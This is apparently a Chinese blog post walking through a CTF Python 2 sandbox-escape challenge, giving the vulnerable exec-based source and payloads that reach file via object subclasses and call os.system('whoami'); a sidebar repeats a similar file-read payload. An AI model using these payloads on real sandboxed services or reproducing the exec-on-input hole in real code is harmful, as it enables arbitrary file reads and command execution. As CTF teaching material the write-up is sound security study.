python图灵测试_一道简单的CTFpython沙箱逃逸题目

最新推荐文章于 2022-03-03 22:58:21 发布
最新推荐文章于 2022-03-03 22:58:21 发布
阅读量638 收藏
点赞数
文章标签: python图灵测试

看了几天的ssti注入然后了解到有python沙箱逃逸

学过ssti注入的话python沙箱逃逸还是很容易理解的。

看一道CTF题目,源码的话我改了改,一开始不能用,直接在py2上运行就好。

题目要求读取./key的值,我们这里来执行命令。

def make_secure():

UNSAFE = ['open',

'file',

'execfile',

'compile',

'reload',

'__import__',

'eval',

'input']

for func in UNSAFE:

del __builtins__.__dict__[func]

from re import findall

# Remove dangerous builtins

make_secure()

print 'Go Ahead, Expoit me >;D'

while True:

try:

# Read user input until the first whitespace character

inp = findall('\S+', raw_input())[0]

a = None

# Set a to the result from executing the user input

exec 'a=' + inp

print 'Return Value:', a

except Exception as e:

print 'Exception:', e

题目一开始就删除了些危险函数,比如file等。

那删除和没删除有什么区别呢?

通俗来说,就是不能直接调用了。builtins里面被删除的函数不能被直接调用了。

那我们能不能通过别的办法调用file呢?答案是肯定的

"".__class__.__mro__[2].__subclasses__()[40]

这段不是builtins里面的函数,是直接从object拿来调用的,所以没问题。

很轻松的就读到了key,可我们的目标是提权。

我想用os模块,一种是从别的模块能不能直接调用它:

[71](可以直接调用os模块)

另一种需要eval配合__import__导入os模块

[59]

open,eval,file,__import__,reload(并没有os,需要用eval配合__import__导入),可是这段需要builtins,里面的__import__被删除了。这个办法我想应该行不通。

所以我们先找到模块

''.__class__.__mro__[2].__subclasses__()[72]

''.__class__.__mro__[2].__subclasses__()[71]

两个都试试,我linux和windows不一样不知道为啥,然后

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('whoami')完成命令执行

weixin_39640417
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF python沙箱逃逸进阶题目
weixin_30432579的博客
01-12 557
future引用了python3的新特性,所以是不能直接回回显,得用print file函数可以读取。 print(().__class__.__bases__[0].__subclasses__()[40]('./sx2.py').read()) 读取源码后: from __future__ import print_function banned = [ "import", ...
第一章作业
Galaxy
06-07 1148
人工智能第一章作业
什么是图灵测试
m0_51738855的博客
09-14 829
图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,我们已远远落后于这个预测。 图灵采用“问”与“答”模式,即观察者通过
图灵测试
ymx_hiter的博客
01-16 4221
图灵测试(The Turing test): 由艾伦·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。进行多次测试后,如果机器让平均每个参与者做出超过30%的误判(将本为机器的对方判断为人)那么这台机器就通过了测试,并被认为具有人类智能。 图灵测试一词来源于计算机科学和密码学的先驱艾伦·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。 ...
中国剩余定理
qq_52193383的博客
08-12 705
中国剩余定理: 设m1,…,mk是k个两两互素的正整数,则对任意的整数b1,…,bk,同余式组: x ≡ b1 (mod m1) …… …… …… x = bk (mod mk) 一定有解,且解是唯一的。 (1)若令m = m1*…*mk,m = mi * Mi, i = 1,…k 则同余式组的解可以表示为 x ≡ b1 * M1’ * M1 + … + bk * Mk’ * Mk (mod m) 其中Mi’为Mi模mi的逆元,即Mi’ * Mi ≡ 1 (mod mi),i = 1,…,k (2)若令N
图灵测试的明与暗_人工智能_图灵测试_
09-28
图灵测试的明与暗》是一篇深入探讨人工智能领域核心议题——图灵测试的文献。这篇文章以图灵测试为切入点,对人工智能的发展、局限性和伦理道德问题进行了全面的剖析,具有很高的参考价值。图灵测试,由英国计算机...
yuyin_stripiw9_include94n_python_语音机器人_图灵机器人_
09-29
在本文中,我们将深入探讨如何使用Python来构建一个基于语音的智能机器人,结合百度语音识别、图灵机器人和百度语音合成功能。首先,我们来看看标题"yuyin_stripiw9_include94n_python_语音机器人_图灵机器人_",这...
[图灵程序设计丛书].Python机器学习经典实例.zip_python 机器学习_python程序设计_图灵_机器学习_机器学
07-15
机器学习的实践书,图灵程序设计用书。有需要的可以学习一下
图灵2016_Python网络编程 (3rd)
08-30
《图灵2016_Python网络编程 (3rd)》是图灵程序员系列丛书中的一本,专门针对Python语言在网络编程领域的应用进行深入探讨。这本书的第三版更新了最新的Python版本及相关网络库,旨在帮助读者掌握利用Python进行网络...
CIT_Python_Blockchain_AWS
04-23
标题 "CIT_Python_Blockchain_AWS" 暗示了这个压缩包文件可能包含一个项目,该项目专注于使用Python编程语言、区块链技术和Amazon Web Services(AWS)进行开发。以下是基于这些关键元素的详细知识点讲解: 1. **...
ctf-python题记
qq_46041723的博客
11-15 943
python前言fastapi简介fastapi安装使用题目做题过程的payload部分解析后记 前言 上次做ctfshow的1024挑战杯,发现web题都没见过的题型,因此没有全部记录下来,这次特意对其中一个题进行一个较为详细的记录 fastapi 简介 fastapi是高性能的web框架。他的主要特点是: 快速编码 减少人为bug 直观 简易 具有交互式文档 基于API的开放标准(并与之完全兼容):OpenAPI(以前称为Swagger)和JSON Schema。 fastapi安装使用 大师傅
python 重定向 ctf_CTF web题型解题技巧 第四课 web总结
weixin_39615984的博客
12-10 709
以下内容大多是我在学习过程中,借鉴前人经验总结而来,部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;----------------------------------------------------------------------------------------------------------------------工具集:基础工具:Burpsuite,pyt...
python 计算器 eval ctf_CTF逆向--.NET与Python
weixin_42127835的博客
01-13 599
题目(来源:Jarvis-OJ):Classical CrackmeClassical CrackMe2FindKeyLoginClassical Crackme首先查壳 没有壳,不过发现这是一个.net的程序,将其拖进dnSpy中,找到主程序,同时发现关键代码,如下所示:private void \u202C\u200B\u206A\u202A\u206D\u206B\u202D\u2...
北大计算机mooc题库,人工智能原理MOOC习题集及答案 北京大学 王文敏
weixin_29679557的博客
07-16 3104
Quizzes for Chapter 11单选(1分)图灵测试旨在给予哪一种令人满意的操作定义得分/总分∙ A.人类思考∙ B.人工智能∙ C.机器智能1.00/1.00∙D.机器动作正确答案:C你选对了2多选(1分)选择以下关于人工智能概念的正确表述得分/总分∙ A.人工智能旨在创造智能机器该题无法得分/1.00 ∙B.人工智能是研究和构建在给定环境下表现良好的智能体程...
python沙箱逃逸学习笔记
bfd9988的博客
06-05 830
python沙箱逃逸学习笔记0x01基础知识:0x02逃逸姿势小结(以下内容主要基于python2.7.13):0x03攻破幸运数字: MakerCTF上我写的一道题,叫幸运数字,做的状况不太好……其实当时没打算出难,应该是因为提示给的不到位2333,也算是总结经验了。但平时web题还是以PHP为主,可能很多同学对这方面的了解不是太多,在这里稍微做点总结,希望可以帮到大家。 题目链接:https:...
一道简单CTFpython沙箱逃逸题目
weixin_30345055的博客
01-12 306
看了几天的ssti注入然后了解到有python沙箱逃逸 学过ssti注入的话python沙箱逃逸还是很容易理解的。 看一道CTF题目,源码的话我改了改,一开始不能用,直接在py2上运行就好。 题目要求读取./key的值,我们这里来执行命令。 def make_secure(): UNSAFE = ['open', 'file', 'e...
深入分析沙箱逃逸漏洞
kali_Ma的博客
03-03 877
Root Case 下面我们先来看一下漏洞的产生原理,从补丁开始入手,其中最主要的就是下面这个函数: bool IsAcceptingRequests() { return !is_commit_pending_ && state_ != COMMITTING && state_ != FINISHED; } 补丁在每个DatabaseImpl和TransactionImpl接口中添加了该判断,使得处于COMMITTING和FINISHED状态的trans
python沙箱逃逸小结
Assassin
11-11 8576
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下 首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情 我们输入dir('builtins')发现如下 我们在python的object类中集成了很多的基础函数,我们想要调用的时
HDCTF-easypyc-python文件格式
playmaker的博客
05-27 1370
前记 拿到题目是一个pyc文件,像往常一样,直接往Easy Python Decompiler里丢,但是却出现了文件头错误的信息。。放入winhex中改了文件头,再反编译没用。。。然后发现一些列东西与网上的pyc文件格式不同。。之后就改格式放入工具,改放入工具。重复了n次。。就放弃了这道题。 解题过程 赛后看了wp,才知道不同版本python格式还是不同的 基本格式 pyc 文件一般由 3 个部分...
python图灵测试
最新发布
09-16
总的来说,使用Python编写图灵测试程序较为简单,只需利用Python的文本处理和逻辑判断的特性即可实现一个基本的回答机器人。当然,如果要实现更复杂的图灵测试程序,可能需要结合其他的人工智能技术和大数据处理方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值